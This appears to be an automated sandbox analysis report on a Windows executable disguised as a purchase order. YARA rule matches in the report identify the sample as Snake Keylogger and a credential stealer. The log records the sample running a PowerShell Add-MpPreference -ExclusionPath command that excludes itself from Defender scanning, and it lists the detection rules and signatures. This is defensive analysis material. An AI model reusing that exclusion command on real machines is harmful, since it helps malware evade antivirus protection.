                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1776294956.0000000000C1E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamemscorlib.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\040904B0\\OriginalFilename vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenamercnOB.exe" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: $^q,\\StringFileInfo\\000004B0\\OriginalFilename vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Windows.Forms.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Drawing.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Configuration.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Core.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameSystem.Xml.dllT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMicrosoft.VisualBasic.DLLT vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1777399011.0000000002BC5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1778472748.0000000003BA9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000000.00000002.1787406592.0000000007110000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4176013298.0000000004DA9000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: OriginalFilenameUNKNOWN_FILET vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe, 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmpBinary or memory string: OriginalFilenameRemington.exe4 vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeBinary or memory string: OriginalFilenamercnOB.exe" vs PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                  Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 4.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000004.00000002.4165610770.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000000.00000002.1778472748.0000000003D3B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 2896, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe PID: 7340, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, B-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, B-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d7e5b8.5.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, B-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, B-.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3d3bb98.0.raw.unpack, --.csCryptographic APIs: 'TransformFinalBlock'
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, Oeqh8dDwUiwosl8xFO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.7110000.7.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: _0020.SetAccessControl
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, C5gGFg5FauOGa29wLc.csSecurity API names: _0020.AddAccessRule
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3e13ed8.1.raw.unpack, Oeqh8dDwUiwosl8xFO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: 0.2.PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.3c73a28.4.raw.unpack, Oeqh8dDwUiwosl8xFO.csSecurity API names: System.Security.Principal.WindowsIdentity.GetCurrent()
                  Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@6/8@4/3
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe.logJump to behavior
                  Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4108:120:WilError_03
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMutant created: \Sessions\1\BaseNamedObjects\DTjljdRoy
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeMutant created: NULL
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_wxcxcazm.2v2.ps1Jump to behavior
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeReversingLabs: Detection: 78%
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeFile read: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess created: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeProcess created: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe "C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: dwrite.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: windowscodecs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: iconcodecservice.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Users\user\Desktop\PO-1124-0018- TTR-ASP1 .. 20 adet 0191621.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
